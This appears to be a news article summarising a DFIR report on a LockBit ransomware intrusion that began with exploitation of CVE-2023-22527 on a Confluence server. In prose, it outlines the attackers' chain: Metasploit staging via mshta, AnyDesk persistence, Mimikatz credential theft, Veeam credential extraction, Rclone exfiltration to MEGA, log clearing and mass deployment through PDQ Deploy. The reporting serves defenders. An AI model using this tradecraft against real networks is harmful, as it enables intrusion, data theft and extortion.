A recent cyberattack has highlighted the vulnerabilities of exposed servers, as hackers exploited a critical flaw in an Atlassian Confluence server to unleash LockBit ransomware.
The intrusion began with the exploitation of CVE-2023-22527, a remote code execution vulnerability, allowing the attackers to execute arbitrary commands on the server.
This vulnerability, with a CVSS score of 10.0, was exploited by sending crafted HTTP POST requests to specific endpoints, enabling the execution of malicious Object-Graph Navigation Language (OGNL) expressions.
Exploitation and Lateral Movement
After gaining initial access, the threat actors executed system discovery commands such as net user and whoami to gather information about user accounts and the current user.
They then attempted to download AnyDesk but initially failed due to a failed curl command.
Instead, they used the mshta utility to download a Metasploit stager, establishing command and control with the Metasploit server.
According to the DFIR report, this allowed them to successfully install AnyDesk, providing persistent remote access.
The attackers created a new local administrator account and used it to access the server via RDP, further leveraging tools like Mimikatz to extract credentials.
The attackers moved laterally across the network using RDP, targeting a backup server and a file share server.
On the backup server, they executed a PowerShell script to extract Veeam credentials, while on the file server, they deployed Rclone to exfiltrate data to MEGA.io cloud storage.
After exfiltrating sensitive data, they cleared Windows event logs to evade detection.
Deployment of LockBit Ransomware
The threat actors deployed LockBit ransomware across the environment using multiple methods.
Initially, they manually executed the ransomware on a backup server and a file server over active RDP sessions.
To ensure widespread encryption, they leveraged PDQ Deploy, a legitimate enterprise deployment tool, to automate ransomware distribution across the network.
PDQ Deploy allowed them to remotely execute scripts on remote hosts, effectively encrypting multiple systems.
The attackers also created a batch script to mount remote systems’ C$ shares, ensuring a secondary encryption wave in case PDQ Deploy missed any targets.
The entire intrusion, from initial access to ransomware deployment, took just over two hours, highlighting the rapid nature of the attack.
The attackers left a ransom note and modified the desktop background on compromised hosts, marking the completion of the ransomware attack.
This incident underscores the importance of securing exposed servers and patching critical vulnerabilities to prevent such swift and devastating attacks.
